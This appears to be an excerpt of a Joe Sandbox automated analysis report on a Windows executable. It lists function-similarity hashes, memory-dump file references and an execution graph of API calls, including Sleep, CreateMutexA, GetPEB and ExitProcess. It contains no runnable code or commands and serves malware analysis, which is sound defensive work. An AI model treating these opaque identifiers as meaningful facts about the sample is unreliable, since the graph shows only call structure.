                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Mtx_unlock$Cnd_broadcast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 32384418-0
                                                                                                                                                                                                                                                  • Opcode ID: 1e9c0538a40f9524158fe998f76355e3b515495a53f43311aa92fe0046296551
                                                                                                                                                                                                                                                  • Instruction ID: 4707a41b1139a36722ef6fd2bf6e06cdd5d464c32c5a3894ebcb288d7a0206fb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e9c0538a40f9524158fe998f76355e3b515495a53f43311aa92fe0046296551
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4A103B0A00225AFDB10DFA4D945B5BBBF8FF15710F1441A9E819E7241EB39EA14CBE1
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _strrchr
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3213747228-0
                                                                                                                                                                                                                                                  • Opcode ID: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
                                                                                                                                                                                                                                                  • Instruction ID: 051be88c314246b39a03a0804e465bda222bde4938d997b6e871e03877dafd82
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82B104329043859FDB158F28C8817AEBFF6EF55341F1441EADC55EB281D6349D4ACB90
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 531285432-0
                                                                                                                                                                                                                                                  • Opcode ID: 474ce5cf2d3abd81c5c2a85ef4179d66ae5e81fffda877eb5a3ce6fa9525a84e
                                                                                                                                                                                                                                                  • Instruction ID: b8eaf973e389c6ea05cfc3bb2049241c88ba815987ca7a4790556c935f2195b9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 474ce5cf2d3abd81c5c2a85ef4179d66ae5e81fffda877eb5a3ce6fa9525a84e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10211071900119AFDF00EBA4D8829BEBBB9EF48710F600055F605B7251DB30AD459B90

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:0.9%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                  Total number of Nodes:617
                                                                                                                                                                                                                                                  Total number of Limit Nodes:4
                                                                                                                                                                                                                                                  execution_graph 10155 f342b0 10158 f33ac0 10155->10158 10157 f342bb shared_ptr 10159 f33af9 10158->10159 10162 f33c38 10159->10162 10163 f33b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 10159->10163 10168 f332d0 10159->10168 10161 f332d0 5 API calls 10165 f33c5f 10161->10165 10162->10161 10162->10165 10163->10157 10164 f33c68 10164->10157 10165->10164 10187 f33810 10165->10187 10169 f4c6ac GetSystemTimePreciseAsFileTime 10168->10169 10177 f33314 10169->10177 10170 f3336b 10171 f4c26a 4 API calls 10170->10171 10172 f3333c __Mtx_unlock 10171->10172 10174 f4c26a 4 API calls 10172->10174 10175 f33350 __floor_pentium4 10172->10175 10173 f4bd4c GetSystemTimePreciseAsFileTime 10173->10177 10176 f33377 10174->10176 10175->10162 10178 f4c6ac GetSystemTimePreciseAsFileTime 10176->10178 10177->10170 10177->10172 10177->10173 10179 f333af 10178->10179 10180 f4c26a 4 API calls 10179->10180 10181 f333b6 __Cnd_broadcast 10179->10181 10180->10181 10182 f4c26a 4 API calls 10181->10182 10183 f333d7 __Mtx_unlock 10181->10183 10182->10183 10184 f4c26a 4 API calls 10183->10184 10185 f333eb 10183->10185 10186 f3340e 10184->10186 10185->10162 10186->10162 10188 f3381c 10187->10188 10191 f32440 10188->10191 10194 f4b5d6 10191->10194 10193 f32472 10195 f4b5f1 std::_Throw_future_error 10194->10195 10196 f68bec __cftof 3 API calls 10195->10196 10198 f4b658 __cftof __floor_pentium4 10195->10198 10197 f4b69f 10196->10197 10198->10193 10346 f355f0 10347 f35610 10346->10347 10347->10347 10348 f322c0 3 API calls 10347->10348 10349 f35710 __floor_pentium4 10347->10349 10348->10347 10350 f343f0 10351 f4bedf InitOnceExecuteOnce 10350->10351 10352 f3440a 10351->10352 10353 f34411 10352->10353 10354 f66cbb 3 API calls 10352->10354 10355 f34424 10354->10355 10453 f32170 10456 f4c6fc 10453->10456 10455 f3217a 10457 f4c724 10456->10457 10458 f4c70c 10456->10458 10457->10455 10458->10457 10460 f4cfbe 10458->10460 10461 f4ccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 10460->10461 10462 f4cfd0 10461->10462 10462->10458 10463 f33970 10464 f4c68b __Mtx_init_in_situ 2 API calls 10463->10464 10465 f339a7 10464->10465 10466 f4c68b __Mtx_init_in_situ 2 API calls 10465->10466 10467 f339e6 10466->10467 9746 f49ef0 9747 f49f0c 9746->9747 9750 f4c68b 9747->9750 9749 f49f17 9753 f4c3d5 9750->9753 9752 f4c69b 9752->9749 9754 f4c3e1 9753->9754 9755 f4c3eb 9753->9755 9756 f4c3be 9754->9756 9757 f4c39e 9754->9757 9755->9752 9766 f4cd0a 9756->9766 9757->9755 9762 f4ccd5 9757->9762 9760 f4c3d0 9760->9752 9763 f4cce3 InitializeCriticalSectionEx 9762->9763 9764 f4c3b7 9762->9764 9763->9764 9764->9752 9767 f4cd1f RtlInitializeConditionVariable 9766->9767 9767->9760 10294 f34276 10295 f32410 4 API calls 10294->10295 10296 f3427f 10295->10296 10427 f68bbe 10428 f68868 3 API calls 10427->10428 10429 f68bdc 10428->10429 10302 f3cc79 10304 f3cc84 shared_ptr 10302->10304 10303 f3ccda shared_ptr __floor_pentium4 10304->10303 10305 f35c10 3 API calls 10304->10305 10306 f3ce9d 10305->10306 10308 f3ca70 10306->10308 10309 f3cadd 10308->10309 10311 f35c10 3 API calls 10309->10311 10313 f3cc87 10309->10313 10310 f3ccda shared_ptr __floor_pentium4 10312 f3ccf9 10311->10312 10318 f39030 10312->10318 10313->10310 10315 f35c10 3 API calls 10313->10315 10316 f3ce9d 10315->10316 10317 f3ca70 3 API calls 10316->10317 10319 f3907f 10318->10319 10320 f35c10 3 API calls 10319->10320 10321 f3909a shared_ptr __floor_pentium4 10320->10321 10321->10313 10199 f39ab8 10201 f39acc 10199->10201 10202 f39b08 10201->10202 10203 f3a917 10202->10203 10204 f39b4b shared_ptr 10202->10204 10205 f3a953 Sleep CreateMutexA 10203->10205 10206 f35c10 3 API calls 10204->10206 10207 f39b59 10204->10207 10209 f3a98e 10205->10209 10208 f39b7c 10206->10208 10210 f38b30 3 API calls 10208->10210 10211 f39b8d 10210->10211 10212 f35c10 3 API calls 10211->10212 10213 f39cb1 10212->10213 10214 f38b30 3 API calls 10213->10214 10215 f39cc2 10214->10215 10216 f320a0 10217 f4c68b __Mtx_init_in_situ 2 API calls 10216->10217 10218 f320ac 10217->10218 10356 f33fe0 10357 f34022 10356->10357 10358 f340d2 10357->10358 10359 f3408c 10357->10359 10362 f34035 __floor_pentium4 10357->10362 10369 f33ee0 10358->10369 10363 f335e0 10359->10363 10364 f33616 10363->10364 10368 f3364e Concurrency::cancel_current_task shared_ptr __floor_pentium4 10364->10368 10375 f32ce0 10364->10375 10366 f3369e 10366->10368 10384 f32c00 10366->10384 10368->10362 10370 f33f48 10369->10370 10371 f33f1e 10369->10371 10372 f33f58 10370->10372 10373 f32c00 3 API calls 10370->10373 10371->10362 10372->10362 10374 f33f7f 10373->10374 10374->10362 10376 f32d1d 10375->10376 10377 f4bedf InitOnceExecuteOnce 10376->10377 10378 f32d46 10377->10378 10379 f32d51 __floor_pentium4 10378->10379 10381 f32d88 10378->10381 10391 f4bef7 10378->10391 10379->10366 10382 f32440 3 API calls 10381->10382 10383 f32d9b 10382->10383 10383->10366 10385 f32c0e 10384->10385 10404 f4b847 10385->10404 10387 f32c42 10388 f32c49 10387->10388 10410 f32c80 10387->10410 10388->10368 10390 f32c58 std::_Throw_future_error 10392 f4bf03 std::_Throw_future_error 10391->10392 10393 f4bf73 10392->10393 10394 f4bf6a 10392->10394 10396 f32ae0 4 API calls 10393->10396 10398 f4be7f 10394->10398 10397 f4bf6f 10396->10397 10397->10381 10399 f4cc31 InitOnceExecuteOnce 10398->10399 10400 f4be97 10399->10400 10401 f4be9e 10400->10401 10402 f66cbb 3 API calls 10400->10402 10401->10397 10403 f4bea7 10402->10403 10403->10397 10405 f4b854 10404->10405 10409 f4b873 Concurrency::details::_Reschedule_chore 10404->10409 10413 f4cb77 10405->10413 10407 f4b864 10407->10409 10415 f4b81e 10407->10415 10409->10387 10421 f4b7fb 10410->10421 10412 f32cb2 shared_ptr 10412->10390 10414 f4cb92 CreateThreadpoolWork 10413->10414 10414->10407 10417 f4b827 Concurrency::details::_Reschedule_chore 10415->10417 10419 f4cdcc 10417->10419 10418 f4b841 10418->10409 10420 f4cde1 TpPostWork 10419->10420 10420->10418 10422 f4b807 10421->10422 10424 f4b817 10421->10424 10422->10424 10425 f4ca78 10422->10425 10424->10412 10426 f4ca8d TpReleaseWork 10425->10426 10426->10424 10521 f34120 10522 f3416a 10521->10522 10523 f33ee0 3 API calls 10522->10523 10524 f341b2 Concurrency::details::_ContextCallback::_CallInContext __floor_pentium4 10522->10524 10523->10524 10430 f39ba5 10431 f39ba7 10430->10431 10432 f35c10 3 API calls 10431->10432 10433 f39cb1 10432->10433 10434 f38b30 3 API calls 10433->10434 10435 f39cc2 10434->10435 10219 f35cad 10221 f35caf shared_ptr __cftof 10219->10221 10220 f35d17 shared_ptr __floor_pentium4 10221->10220 10222 f35c10 3 API calls 10221->10222 10223 f366ac 10222->10223 10224 f35c10 3 API calls 10223->10224 10225 f366b1 10224->10225 10226 f322c0 3 API calls 10225->10226 10227 f366c9 shared_ptr 10226->10227 10228 f35c10 3 API calls 10227->10228 10229 f3673d 10228->10229 10230 f322c0 3 API calls 10229->10230 10232 f36757 shared_ptr 10230->10232 10231 f35c10 3 API calls 10231->10232 10232->10231 10233 f36852 shared_ptr __floor_pentium4 10232->10233 10234 f322c0 3 API calls 10232->10234 10234->10232 9730 f66629 9733 f664c7 9730->9733 9734 f664d5 __cftof 9733->9734 9735 f66520 9734->9735 9738 f6652b 9734->9738 9737 f6652a 9744 f6a302 GetPEB 9738->9744 9740 f66535 9741 f6653a GetPEB 9740->9741 9743 f6654a __cftof 9740->9743 9741->9743 9742 f66562 ExitProcess 9743->9742 9745 f6a31c __cftof 9744->9745 9745->9740 10441 f32b90 10442 f32bce 10441->10442 10443 f4b7fb TpReleaseWork 10442->10443 10444 f32bdb shared_ptr __floor_pentium4 10443->10444 10525 f32b10 10526 f32b1a 10525->10526 10527 f32b1c 10525->10527 10528 f4c26a 4 API calls 10527->10528 10529 f32b22 10528->10529 9725 f3a856 9727 f3a870 9725->9727 9729 f3a892 shared_ptr 9725->9729 9726 f3a953 Sleep CreateMutexA 9728 f3a98e 9726->9728 9727->9726 9727->9729 10530 f4d111 10532 f4d122 10530->10532 10533 f4d12a 10532->10533 10534 f4d199 10532->10534 10535 f4d1a7 SleepConditionVariableCS 10534->10535 10537 f4d1c0 10534->10537 10535->10537 10537->10532 10484 f3215a 10485 f4c6fc InitializeCriticalSectionEx 10484->10485 10486 f32164 10485->10486 10445 f33f9f 10446 f33fad 10445->10446 10448 f33fb6 10445->10448 10447 f32410 4 API calls 10446->10447 10447->10448 9768 f39adc 9771 f39aea shared_ptr 9768->9771 9769 f3a917 9770 f3a953 Sleep CreateMutexA 9769->9770 9772 f3a98e 9770->9772 9771->9769 9773 f39b4b shared_ptr 9771->9773 9775 f39b59 9773->9775 9783 f35c10 9773->9783 9776 f39b7c 9801 f38b30 9776->9801 9778 f39b8d 9779 f35c10 3 API calls 9778->9779 9780 f39cb1 9779->9780 9781 f38b30 3 API calls 9780->9781 9782 f39cc2 9781->9782 9784 f35c54 9783->9784 9811 f34b30 9784->9811 9786 f35d17 shared_ptr __floor_pentium4 9786->9776 9787 f35c7b shared_ptr __cftof 9787->9786 9788 f35c10 3 API calls 9787->9788 9789 f366ac 9788->9789 9790 f35c10 3 API calls 9789->9790 9791 f366b1 9790->9791 9815 f322c0 9791->9815 9793 f366c9 shared_ptr 9794 f35c10 3 API calls 9793->9794 9795 f3673d 9794->9795 9796 f322c0 3 API calls 9795->9796 9798 f36757 shared_ptr 9796->9798 9797 f35c10 3 API calls 9797->9798 9798->9797 9799 f36852 shared_ptr __floor_pentium4 9798->9799 9800 f322c0 3 API calls 9798->9800 9799->9776 9800->9798 9802 f38b7c 9801->9802 9803 f35c10 3 API calls 9802->9803 9804 f38b97 shared_ptr 9803->9804 9805 f38d01 shared_ptr __floor_pentium4 9804->9805 9806 f35c10 3 API calls 9804->9806 9805->9778 9808 f38d9a shared_ptr 9806->9808 9807 f38e7e shared_ptr __floor_pentium4 9807->9778 9808->9807 9809 f35c10 3 API calls 9808->9809 9810 f38f1a shared_ptr __floor_pentium4 9809->9810 9810->9778 9813 f34ce5 9811->9813 9814 f34b92 9811->9814 9813->9787 9814->9813 9818 f66da6 9814->9818 9935 f32280 9815->9935 9819 f66db4 9818->9819 9820 f66dc2 9818->9820 9823 f66d19 9819->9823 9820->9814 9828 f6690a 9823->9828 9827 f66d3d 9827->9814 9829 f66921 9828->9829 9830 f6692a 9828->9830 9836 f66d52 9829->9836 9830->9829 9842 f6a671 9830->9842 9837 f66d8f 9836->9837 9838 f66d5f 9836->9838 9927 f6b67d 9837->9927 9839 f66d6e 9838->9839 9922 f6b6a1 9838->9922 9839->9827 9843 f6a67b __dosmaperr ___free_lconv_mon 9842->9843 9844 f6694a 9843->9844 9855 f68bec 9843->9855 9847 f6b5fb 9844->9847 9848 f66960 9847->9848 9849 f6b60e 9847->9849 9851 f6b628 9848->9851 9849->9848 9881 f6f5ab 9849->9881 9852 f6b63b 9851->9852 9854 f6b650 9851->9854 9852->9854 9888 f6e6b1 9852->9888 9854->9829 9856 f68bf1 __cftof 9855->9856 9860 f68bfc __cftof 9856->9860 9861 f6d634 9856->9861 9875 f665ed 9860->9875 9863 f6d640 __cftof __dosmaperr 9861->9863 9862 f6d69c __cftof __dosmaperr 9862->9860 9863->9862 9864 f6d726 9863->9864 9865 f6d81b __cftof 9863->9865 9867 f6d751 __cftof 9863->9867 9864->9867 9878 f6d62b 9864->9878 9866 f665ed __cftof 3 API calls 9865->9866 9868 f6d82e 9866->9868 9867->9862 9870 f6a671 __cftof 3 API calls 9867->9870 9873 f6d7a5 9867->9873 9870->9873 9872 f6d62b __cftof 3 API calls 9872->9867 9873->9862 9874 f6a671 __cftof 3 API calls 9873->9874 9874->9862 9876 f664c7 __cftof 3 API calls 9875->9876 9877 f665fe 9876->9877 9879 f6a671 __cftof 3 API calls 9878->9879 9880 f6d630 9879->9880 9880->9872 9882 f6f5b7 __dosmaperr 9881->9882 9883 f6a671 __cftof 3 API calls 9882->9883 9885 f6f5c0 __cftof __dosmaperr 9883->9885 9884 f6f606 9884->9848 9885->9884 9886 f68bec __cftof 3 API calls 9885->9886 9887 f6f62b 9886->9887 9889 f6a671 __cftof 3 API calls 9888->9889 9890 f6e6bb 9889->9890 9893 f6e5c9 9890->9893 9892 f6e6c1 9892->9854 9896 f6e5d5 __cftof __dosmaperr ___free_lconv_mon 9893->9896 9894 f6e5f6 9894->9892 9895 f68bec __cftof 3 API calls 9897 f6e668 9895->9897 9896->9894 9896->9895 9898 f6e6a4 9897->9898 9902 f6a72e 9897->9902 9898->9892 9903 f6a739 __dosmaperr ___free_lconv_mon 9902->9903 9904 f68bec __cftof 3 API calls 9903->9904 9906 f6a7be 9903->9906 9905 f6a7c7 